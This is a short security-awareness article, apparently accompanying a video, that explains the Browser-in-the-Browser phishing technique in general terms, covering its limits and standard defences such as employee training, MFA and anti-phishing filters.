A new phishing variant has been observed recently, the Browser in the Browser (BitB). It is simply an attack aimed at deceiving the usual detection techniques by generating a fake window inside a real window.
Understanding the BitB Technique
Indeed, most of the time, the victim detects a phishing login page by checking the legitimacy of the URL displayed in the browser's address bar. The Browser in the Browser bypasses this detection technique by turning it against the user. The fake window will display a legitimate address to make the user trust it.
Exploring BitB Tactics
The attacker will therefore generate this fake window as if they were doing web design, using JavaScript, CSS, and HTML to make it look as close as possible to the original. Seeing a legitimate URL on the login page, the user will fall into the attacker's trap and provide their credentials.
Challenges and Adaptations
This technique is still improvable, it is not possible to separate the fake window from the real one. It is also impossible to display the fake window in full screen or to allow the user to resize it.
However, the attacker can directly detect the browser used by their target and whether it is in light or dark mode. With this information, the attacker will adapt their fake window to make it more coherent.
Defense Strategies Against BitB
In the face of this type of attack, it is important to communicate so that the Browser in the Browser does not remain unknown. Train employees to check the links they receive via email and to carefully observe the nature of login pop-ups.
The "classic" anti-phishing arsenal remains in place:
- Anti-phishing filter
- MFA
- Web proxy
- Phishing awareness solution
Key Takeaways from the Video:
In this video, you will learn:
- What is the Browser in the Browser attack?
- What does the technique of "Browser in the Browser" look like through a demonstration?
- How to prevent the Browser in the Browser?
- What improvements can be expected regarding these attacks?